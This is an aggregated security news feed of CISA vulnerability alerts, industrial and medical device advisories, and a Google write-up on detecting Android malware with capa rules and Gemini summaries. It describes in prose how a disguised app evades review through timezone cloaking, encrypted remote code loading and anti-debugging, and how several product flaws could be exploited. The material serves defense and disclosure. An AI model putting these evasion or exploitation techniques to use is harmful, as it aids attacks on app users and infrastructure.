From wave energy to e-waste recycling and more, Cisco Investments supports cutting-edge innovation for a more sustainable future. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/climate-investments-that-help-businesses-as-well-as-the-planet.html
CISA Adds One Known Exploited Vulnerability to Catalog
2025-02-07T12:00:00Z | 1738929600

CISA has added one vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-0994 Trimble Cityworks Deserialization Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

https://www.cisa.gov/news-events/alerts/2025/02/07/cisa-adds-one-known-exploited-vulnerability-catalog
Trimble Releases Security Updates to Address a Vulnerability in Cityworks Software
2025-02-07T12:00:00Z | 1738929600

CISA is collaborating with private industry partners to respond to reports of exploitation of a vulnerability (CVE-2025-0994) discovered by Trimble impacting its Cityworks Server AMS (Asset Management System). Trimble has released security updates and an advisory addressing a recently discovered deserialization vulnerability enabling an external actor to potentially conduct remote code execution (RCE) against a customer’s Microsoft Internet Information Services (IIS) web server.  CISA has added CVE-2025-0994 to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.  CISA strongly encourages users and administrators to search for indicators of compromise (IOCs) and apply the necessary updates and workarounds.  Review the following article for more information:  Trimble Advisory and IOCs for Vulnerability Affecting Cityworks Deployments  The Symantec Threat Hunter team, part of Broadcom, contributed to this guidance.

https://www.cisa.gov/news-events/alerts/2025/02/07/trimble-releases-security-updates-address-vulnerability-cityworks-software
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 05/2025
2025-02-07T11:27:09Z | 1738927629

This week we’ll cover topics such as the malware that is spreading on internet marketplaces and how associations must also invest in information security

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-052025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 05/2025
2025-02-07T11:27:09Z | 1738927629

This week we’ll cover topics such as the malware that is spreading on internet marketplaces and how associations must also invest in information security

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-052025
Towards responsible cybersecurity: the central role of the CISO in CSR strategy
2025-02-07T09:14:18Z | 1738919658

Corporate Social Responsibility (CSR) is now a key strategic priority, with cybersecurity playing a key role in this respect. Recent initiatives such as Cyber4Tomorrow and the work of the Cyber Campus are promoting a conversation on environmentally friendly cybersecurity practices. These approaches highlight the importance... The post Towards responsible cybersecurity: the central role of the CISO in CSR strategy appeared first on Stormshield.

https://www.stormshield.com/news/towards-responsible-cybersecurity-the-central-role-of-the-ciso-in-csr-strategy/
Security Alert (A25-02-07): Multiple Vulnerabilities in Microsoft Edge
2025-02-07T04:00:00Z | 1738900800

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Processo de transposição da Diretiva NIS2
2025-02-07T00:00:00Z | 1738886400

Foi aprovada no dia 6 de fevereiro, em reunião do Conselho de Ministros, a proposta de Lei de autorização legislativa que estabelece o novo Regime Jurídico da Cibersegurança, que transpõe a Diretiva (UE) 2022/2555, do Parlamento Europeu e do Conselho, de 14 de dezembro, mais conhecida como “Diretiva NIS2”, cujo objetivo é garantir um elevado nível comum de cibersegurança em toda a União Europeia.Esta aprovação acontece após a fase de consulta pública, que decorreu entre 11 de novembro 31 de dezembro de 2024, da qual resultaram 149 contributos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135912/processo-de-transposicao-da-diretiva-nis2
Almost famous: behind the scenes of a feature that didn’t make the cut
2025-02-06T20:07:30Z | 1738872450

Introduction A counterintuitive truth is that great products are defined by both the features they include, as well as those they don’t. We spend a lot of time pondering potential new features for Thinkst Canary to make sure the added value exceeds the inevitable cognitive complexity that new features (or new UX elements) bring. This post will dive into a recent Labs research effort that we ended up leaving on the cutting room floor. Background We are always on the lookout for attacker techniques that can be repurposed for defense. A likely candidate emerged when skimming the recent CISA red team reports (1, 2): Abusing Unconstrained Kerberos Delegation in Active Directory networks. Active Directory (AD) allows for ease of use through single-sign-on (SSO). A user who’s logged into their workstation can navigate internal file-shares, web applications, and databases without having a separate user account to manage (or another password to remember). The user’s machine works with the AD domain controller (DC) and either presents an authentication hash, or, preferably, uses the Kerberos protocol to mutually authenticate to a server. SSO with Kerberos simplifies the user interaction, and prevents a host of hijacking or adversary-in-the-middle attacks, since both the client and […]

https://blog.thinkst.com/2025/02/almost-famous-behind-the-scenes-of-a-feature-that-didnt-make-the-cut.html
Why DeepSeek’s Low Price Could Cost You Everything
2025-02-06T17:20:52Z | 1738862452

While its capabilities are impressive, this development raises significant concerns about the hidden costs and potential security risks associated with its widespread adoption.

https://mixmode.ai/blog/why-deepseeks-low-price-could-cost-you-everything/
CVE-2025-1002
2025-02-06T16:33:00Z | 1738859580

CWE-295 IMPROPER CERTIFICATE VALIDATION: MicroDicom DICOM Viewer fails to adequately verify the update server's certificate, which could make it possible for attackers in a privileged network position to alter network traffic and carry out a machine-in-the-middle (MITM) attack. This allows the attackers to modify the server's response and deliver a malicious update to the user. MicroDicom recommends users upgrade to DICOM Viewer version 2025.1

https://claroty.com/team82/disclosure-dashboard/cve-2025-1002
SecDevOps for Multilayer Security in Intelligence Platforms
2025-02-06T14:56:40Z | 1738853800

Security is a core engineering requirement for the SS8 platform, governed by strict sets of requirements at every stage, including ongoing automated scans of code, builds, packaging, and network traffic. The post SecDevOps for Multilayer Security in Intelligence Platforms appeared first on SS8.

https://www.ss8.com/secdevops-for-multilayer-security-in-intelligence-platforms/
Cryptominers? Anatomy: Cryptomining Internals
2025-02-06T14:00:00Z | 1738850400

https://www.akamai.com/blog/security-research/2025/feb/2025-february-cryptominer-anatomy-internals
Using capa Rules for Android Malware Detection
2025-02-06T14:00:00Z | 1738850400

Mobile devices have become the go-to for daily tasks like online banking, healthcare management, and personal photo storage, making them prime targets for malicious actors seeking to exploit valuable information. Bad actors often turn to publishing and distributing malware via apps as a lucrative channel for generating illegal and/or unethical profits.  Android takes a multi-layered approach to combating malware to help keep users safe (more later in the post), but while we continuously strengthen our defenses against malware, threat actors are persistently updating their malware to evade detection. Malware developers used to complete their entire malicious aggression using the common Android app development toolkits in Java, which is easier to detect by reversing the Java bytecode. In recent years, malware developers are increasing the use of native code to obfuscate some of the critical malware behaviors and putting their hopes on obscuration in compiled and symbol-stripped Executable and Linkable Format (ELF) files, which can be more difficult and time-consuming to reveal their true intentions. To combat these new challenges, Android Security and Privacy Team is partnering with Mandiant FLARE to extend the open-source binary analysis tool capa to analyze native ARM ELF files targeting Android. Together, we improved existing and developed new capa rules to detect capabilities observed in Android malware, used the capa rule matches to highlight the highly suspicious code in native files, and prompted Gemini with the highlighted code behaviors for summarization to enhance our review processes for faster decisions. In this blog post, we will describe how we leverage capa behavior-detection capabilities and state-of-art Gemini summarization by: Showcasing a malware sample that used various anti-analysis tricks to evade detections Explaining how our existing and new capa rules identify and highlighted those behaviors Presenting how Gemini summarizes the highlighted code for security reviews An Illegal Gambling App Under a Music App Façade Google Play Store ensures all published apps conform to local laws and regulations. This includes gambling apps, which are prohibited or require licenses in some areas. Developing and distributing illegal gambling apps in such areas can generate significant illicit profits, which sometimes is associated with organized crimes. To bypass Google Play Store's security-screening procedures, some gambling apps disguise themselves with harmless façades like music or casual games. These apps only reveal their gambling portals in certain geographic markets using various anti-analysis tricks. Unfortunately, dynamic analysis, such as emulation and sandbox detonation, relies on specific device configurations, and threat actors keep trying different combinations of settings to evade our detections. It's an ongoing game of cat and mouse! In response, the Android Security and Privacy Team has evolved static analysis techniques, such as those that evaluate the behavior of a complete program and all its conditional logic. So, let's describe an app that violated Google Play Store rules and show how we can better detect and block other apps like it. We received reports of a music app opening gambling websites for users in certain geographical areas. It used an interesting trick of hiding key behaviors in a native ELF file that has most symbols (except the exported ones) stripped and is loaded at runtime to evade detection. When we decompiled the app into Java source code, using a tool like JEB Decompiler, we found that the app has a song-playing functionality as shown in "MainActivity" of Figure 1. This looks like benign behavior and is fully within the limits of Google Play Store policies. However, there was a small region of initialization code that loads an ELF file as soon as the app is initialized when calling the onCreate function, as shown in com.x.y.z class of Figure 1. To fully understand the behavior of the entire app, we also had to reverse engineer the ELF file, which requires a completely different toolset. Figure 1: How the app applies anti-analysis techniques Using a tool like Ghidra, we decompiled the ARM64 ELF file into C source code and found that this app estimates the user's geographic location using timezone information ("Code Section 1" in Figure 1). The code implements a loop that compares the user's timezone with a list of target regions ("Data Section" in Figure 1). If the user's location matches a value in the list ("Data Section" in Figure 1), this malware: Downloads an encrypted DEX file from a remote server ("Code Section 2" in Figure 1) Decrypts the downloaded DEX file ("Code Section 3" in Figure 1) Loads the decrypted DEX file into memory ("Code Section 4" in Figure 1) The loaded DEX file uses further server-side cloaking techniques and finally loads a gambling website (Figure 3) to the app users. Compared to the app icon in Figure 2, it is an obvious mismatch of the app's advertised functionality. Figure 2: The app icon as published Figure 3: The loaded gambling website in app While there are many detection technologies, such as YARA, available for identifying malware distributed in ELF files, they are less resilient to app updates or variations introduced by threat actors. Fortunately, the Android Security and Privacy Team has developed new techniques for detecting malicious Android apps by inspecting their native ELF components. For example, in the gambling app in Figure 3, there are many API calls dynamically resolved via the Java Native Interface (JNI) that interact with the Android runtime. Our detection systems recognized these cross-runtime interactions and reason about their intent. We've enumerated behaviors commonly seen in Android malware, such as making ptrace API calls, extracting device information, downloading code from remote servers to local storage, and making various cryptographic operations via JNI, turning them into capa detections we can use to identify and block Google Play Store threats. Let's now talk a little more about how this works. Android capa Rules capa is a tool that detects capabilities in executable files. You run it against a compiled program, and it tells you what it thinks the program can do. For example, capa might suggest that a file is a backdoor, is capable of installing services, or relies on HTTP to communicate. Mandiant FLARE extended capa to support BinExport2, an architecture agnostic representation of disassembled programs. This enables capa to match capabilities for additional architectures and file formats, such as those supported by Ghidra and its BinExport2 plugin, with an initial focus on ARM64 ELF files. The Android Security and Privacy Team then created new capa rules focused specifically on detecting capabilities observed in ARM64 ELF files used by various Android malware samples. These proprietary rules alongside capa's open-source rules are used to detect malware capabilities as part of internal Android malware analysis pipelines. Referring back to the gambling app in Figure 3, the following Google proprietary rules and open-source capa rules matched the malicious functions performing cloaking techniques for further inspection. Proprietary rules: Make ptrace API calls Extract device configuration information via JNI on Android Extract timezone via JNI on Android Encode or decode data using Base64 via JNI on Android Encrypt or decrypt data using Cipher API via JNI on Android Open-source capa rules: Create or open file Write file on Linux Read file on Linux Check file permission on Linux Create thread Reference Base64 string Instead of browsing hundreds of thousands lines of obfuscated code, our analysts were able to quickly identify the evidence of the app's wrong-doings using the function addresses matching those rules and enforced on the app. Gemini Summaries of capa Rule Matches Safeguarding the Android ecosystem, our Android malware analysis pipelines scan millions of ELF files in-depth every day, each one containing thousands to millions of lines in their decompiled codes. On top of the fast-evolving Gemini capabilities in malware analysis, capa rules are able to select the most interesting code for Gemini summarization, with sharpened focus on a much smaller set of the most suspicious functions. Figure 4: How capa rules and Gemini help our reviewers and automation We asked Gemini to summarize the functions matched on capa rules from the earlier gambling app with the following prompt: You are a world-class Android reverse engineer with malware analysis specialities. You are given a few functions from an ARM/AArch64 ELF file as part of an Android App, with their decompiled pseudo-C codes. You need to analyze these functions to         1. summarize what these functions try to achieve         2. decide whether any of them has code/behavior patterns that would be found in Android malware. {some more instructions…} … These functions are decompiled by Ghidra into pseudo-C format as follows: [function_1 content] [function_2 content] … In your response, please give your overall verdict assessing the risk level using HIGH / MEDIUM / LOW in the beginning, and explain your rationale for each potential malicious behavior. Gemini responded with the following suggestions: VERDICT: HIGH RISK The provided Android application code exhibits several concerning behaviors strongly indicative of malicious intent. The risk level is assessed as HIGH due to the presence of multiple red flags consistent with sophisticated Android malware techniques. The analysis below details the specific malicious behavior patterns observed: 1. Dynamic Code Loading (HIGH): The function comeOn demonstrates a pattern of dynamically loading and executing code. The app fetches files (potentially DEX or ELF) using getCacheFilePath and downloadFile, then attempts to execute them using getDexClassLoader. This is a classic technique for delivering malicious payloads after initial installation, allowing the malware to easily update its functionality and evade static analysis. The use of custom decryption (decryptFile, decryptAES) further enhances the obfuscation and anti-analysis capabilities, indicating a deliberate attempt to conceal the loaded code's true nature. 2. Custom Decryption and Execution (HIGH): The decryptFile function performs custom decryption of a file, likely to obfuscate the malicious payload. The decryption utilizes an AES algorithm, which adds a layer of complexity to the reversal process. In combination with the dynamic loading, this points strongly towards a sophisticated malware strategy. The decrypted file is then written to disk (fopen, fwrite) and executed using a custom class loader. 3. Time Cloaking (MEDIUM): thread_function incorporates time-based cloaking. It checks the user's timezone (getTimeZoneInfo) and potentially alters behavior if the timezone is not "America/Sao Paulo".  More importantly, it appends a timestamp ("?time=" + current time) to a string used for downloading further files. This suggests an attempt to evade detection by changing behavior based on the device's time and potentially making analysis more challenging by dynamically creating different network requests. 4. Network Cloaking (MEDIUM): thread_function exhibits additional cloaking behavior, though details are limited. The function interacts with network resources to download additional resources, showing its network-active nature. The data used in network operations are likely obfuscated through string manipulation and URL obfuscation, making identification and analysis difficult. The precise cloaking mechanisms used are not fully clear from the decompiled code, but the presence of this behavior is a significant concern. 5. Obfuscation Techniques (HIGH): The entire codebase uses extensive obfuscation techniques. The code is heavily reliant on complex data structures (deques, hash tables, trees) and intricate control flow. Function and variable names are nonsensical, hindering analysis. The use of multiple layers of indirection, combined with aggressive heap memory management (operator_new, operator_delete), makes the code difficult to understand and analyze. These obfuscation methods are typical of malware aiming to evade reverse engineering. 6. Anti-Debugging/Anti-Analysis Techniques (HIGH): The JNI_OnLoad function includes a call to ptrace(PTRACE_TRACEME, 0, 0, 0). This is a clear indicator of an attempt to detect debugging or analysis tools. If a debugger is attached, this function's behavior will likely differ; it could crash, stall the execution, or even hide its malicious code. Conclusion: The combination of dynamic code loading, custom decryption, sophisticated obfuscation, and anti-debugging techniques creates a high likelihood of malicious activity. The incomplete understanding of the role of several custom functions further aggravates the risk. The app's behavior is heavily contingent on received data and time-sensitive factors, raising serious concerns about its potential for wide-ranging malicious acts. Immediate action should be taken to contain and investigate this application further. A detailed sandbox analysis is critical to identify any network communications, file system manipulation, or other abusive activities. As seen in the Gemini output, the Android ELF behaviors are explained clearly on the functions matched on capa rules. In this particular example, Gemini helped to: Accentuate the function call sequences to perform dynamic code loading, where our analysts can easily inspect the key function calls getCacheFilePath and getDexClassLoader Identify the timezone extraction with the additional URL parameter hint, where our analysts may try to probe the malicious payload quickly and accurately Describe more potential suspicious behaviors (e.g. getDexClassLoader JNI call, URL obfuscation) for further rule-writing ideas capa rules in Android together with Gemini summarization shows great potential for further malware detection with more advanced techniques. Our analysts are closely monitoring the malware trends and techniques in the market and writing up-to-date capa rules to catch the bad actors in the wild. Android's Multi-Layered Security Approach Android’s ever-evolving, multi-layered security approach includes integrating advanced features and working with developers and device implementers to keep the Android platform and ecosystem safe. This includes, but is not limited to: Advanced built-in protections: Google Play Protect automatically scans every app on Android devices with Google Play Services, no matter the download source. This built-in protection, enabled by default, provides crucial security against malware and unwanted software. Google Play Protect scans more than 200 billion apps daily and performs real-time scanning at the code-level on novel apps to combat emerging and hidden threats, like polymorphic malware. In 2024, Google Play Protect’s real-time scanning identified more than 13 million new malicious apps from outside Google Play.  Google Play and developer protections from malware: To create a trusted experience for everyone on Google Play, we use our SAFE principles as a guide, incorporating multi-layered protections that are always evolving to help keep Google Play safe. These protections start with the developers themselves, who play a crucial role in building secure apps. We provide developers with best-in-class tools, best practices, and on-demand training resources for building safe, high-quality apps. Every app undergoes rigorous review and testing, with only approved apps allowed to appear in the Play Store. Before a user downloads an app from Play, users can explore its user reviews, ratings, and Data safety section on Google Play to help them make an informed decision.  Engagement with the security research community: Google works closely with the security community on multiple levels, including the App Defense Alliance, to advance app safety standards. Android also collaborates with Google Threat Intelligence Group (GTIG) to address emerging threats and safeguard Android users worldwide. Equipped with the fast-evolving Gemini, our analysts are able to spend less time on those sophisticated samples, minimising the exposure for malicious apps and ensuring the safety of Android ecosystems. Acknowledgement Special thanks to Willi Ballenthin, Yannis Gasparis, Mike Hunhoff, and Moritz Raabe for their support.

https://cloud.google.com/blog/topics/threat-intelligence/capa-rules-android-malware-detection/
Orthanc Server
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.2 ATTENTION: Exploitable remotely/low attack complexity Vendor: Orthanc Equipment: Orthanc Server Vulnerability: Missing Authentication for Critical Function 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to disclose sensitive information, modify records, or cause a denial-of-service condition. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Orthanc products are affected: Orthanc server: Versions prior to 1.5.8 3.2 VULNERABILITY OVERVIEW 3.2.1 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306 Orthanc server prior to version 1.5.8 does not enable basic authentication by default when remote access is enabled. This could result in unauthorized access by an attacker. CVE-2025-0896 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0896. A base score of 9.2 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Healthcare and Public Health COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: Belgium 3.4 RESEARCHER Amitay Dan reported this vulnerability to Orthanc.Souvik Kandar reported this vulnerability to CISA. 4. MITIGATIONS Orthanc recommends that users update to the latest version or enable the HTTP authentication by setting the configuration "AuthenticationEnabled": true in the configuration file. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, utilize more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have their own vulnerabilities and should be updated to the most current version available. Also recognize VPNs are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 6, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-037-02
ABB Drive Composer
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: ABB Equipment: Drive Composer Vulnerability: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 2. RISK EVALUATION Successful exploitation of this vulnerability could allow attackers unauthorized access to the file system on the host machine. An attacker can exploit this flaw to run malicious code, which could lead to the compromise of the affected system. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS ABB reports that the following Drive Composer products are affected: Drive Composer entry: Version 2.9.0.1 and prior Drive Composer pro: Version 2.9.0.1 and prior 3.2 VULNERABILITY OVERVIEW 3.2.1 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') CWE-22 A vulnerability in drive composer can allow attackers unauthorized access to the file system on the host machine. An attacker can exploit this flaw to run malicious code, which could lead to the compromise of the affected system. CVE-2024-48510 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2024-48510. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: Switzerland 3.4 RESEARCHER ABB reported this vulnerability to CISA. 4. MITIGATIONS ABB has corrected this vulnerability in Drive Composer Version 2.9.1. Drive Composer Version 2.9.1 (both entry and pro) is downloadable from the product page. ABB recommends users apply the update at their earliest convenience. For more information, please refer to the ABB Cybersecurity Advisory. ABB recommends the following general security practices for any installation of software-related ABB products: Isolate special purpose networks (e.g. for automation systems) and remote devices behind firewalls and separate them from any general-purpose network (e.g. office or home networks). Install physical controls so no unauthorized personnel can access your devices, components, peripheral equipment, and networks. Never connect programming software or computers containing programing software to any networkother than the network for the devices that it is intended for. Scan all data imported into your environment before use to detect potential malware infections. Minimize network exposure for all applications and endpoints to ensure that they are not accessible from the Internet unless they are designed for such exposure and the intended use requires such. Ensure all nodes are always up to date in terms of installed software, operating system, and firmware patches as well as anti-virus and firewall. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. More information on recommended practices can be found in the following documents:3AXD10000492137 Technical Guide - Cybersecurity for ABB Drives CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY February 6, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-03
CISA Adds Five Known Exploited Vulnerabilities to Catalog
2025-02-06T12:00:00Z | 1738843200

CISA has added five vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2025-0411 7-Zip Mark of the Web Bypass Vulnerability CVE-2022-23748 Dante Discovery Process Control Vulnerability CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability CVE-2020-29574 CyberoamOS (CROS) SQL Injection Vulnerability CVE-2020-15069 Sophos XG Firewall Buffer Overflow Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

https://www.cisa.gov/news-events/alerts/2025/02/06/cisa-adds-five-known-exploited-vulnerabilities-catalog
MicroDicom DICOM Viewer
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 5.7 ATTENTION: Low attack complexity Vendor: MicroDicom Equipment: DICOM Viewer Vulnerability: Improper Certificate Validation 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to alter network traffic and perform a machine-in-the-middle (MITM) attack. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following MicroDicom DICOM Viewer are affected: MicroDicom DICOM Viewer: Version 2024.03 3.2 VULNERABILITY OVERVIEW 3.2.1 IMPROPER CERTIFICATE VALIDATION CWE-295 MicroDicom DICOM Viewer fails to adequately verify the update server's certificate, which could make it possible for attackers in a privileged network position to alter network traffic and carry out a machine-in-the-middle (MITM) attack. This allows the attackers to modify the server's response and deliver a malicious update to the user. CVE-2025-1002 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.7 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N). A CVSS v4 score has also been calculated for CVE-2025-1002. A base score of 5.7 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Healthcare and Public Health COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: Bulgaria 3.4 RESEARCHER Sharon Brizinov of Claroty Team82 reported this vulnerability to CISA. 4. MITIGATIONS MicroDicom recommends users upgrade to DICOM Viewer version 2025.1. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. 5. UPDATE HISTORY February 6, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-037-01
Schneider Electric EcoStruxure
2025-02-06T12:00:00Z | 1738843200

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.5 ATTENTION: Low attack complexity Vendor: Schneider Electric Equipment: EcoStruxure Vulnerability: Uncontrolled Search Path Element 2. RISK EVALUATION Successful exploitation of this vulnerability allows for local privilege escalation, which could lead to the execution of a malicious Dynamic-Link Library (DLL). 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Schneider Electric EcoStruxure products and versions, which incorporate Revenera FlexNet Publisher, are affected: EcoStruxure Control Expert: Versions prior to V16.1 EcoStruxure Process Expert: All versions EcoStruxure OPC UA Server Expert: All versions EcoStruxure Control Expert Asset Link: Versions prior to V4.0 SP1 EcoStruxure Machine SCADA Expert Asset Link: All versions EcoStruxure Architecture Builder: Versions prior to V7.0.18 EcoStruxure Operator Terminal Expert: All versions Vijeo Designer: Version prior to V6.3SP1 HF1 EcoStruxure Machine Expert including EcoStruxure Machine Expert Safety: All versions EcoStruxure Machine Expert Twin: All versions Zelio Soft 2: All versions 3.2 VULNERABILITY OVERVIEW 3.2.1 Uncontrolled Search Path Element CWE-427 A misconfiguration in lmadmin.exe of FlexNet Publisher versions prior to 2024 R1 (11.19.6.0) allows the OpenSSL configuration file to load from a non-existent directory. An unauthorized, locally authenticated user with low privileges can potentially create the directory and load a specially crafted openssl.conf file leading to the execution of a malicious DLL (Dynamic-Link Library) with elevated privileges. CVE-2024-2658 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2024-2658. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Energy, Food and Agriculture, Government Services and Facilities, Transportation Systems, Water and Wastewater Systems COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Xavier DANEST of Trend Micro Zero Day Initiative reported this vulnerability to Revenera PSIRT. 4. MITIGATIONS Schneider Electric recommends that users of the following products follow these actions: EcoStruxure Control Expert: Versions prior to V16.1 - Version V16.1 of EcoStruxure Control Expert includes a fix for this vulnerability and is available for download here. Reboot the computer after installation is completed. EcoStruxure Architecture Builder: Versions prior to V7.0.18 - Version 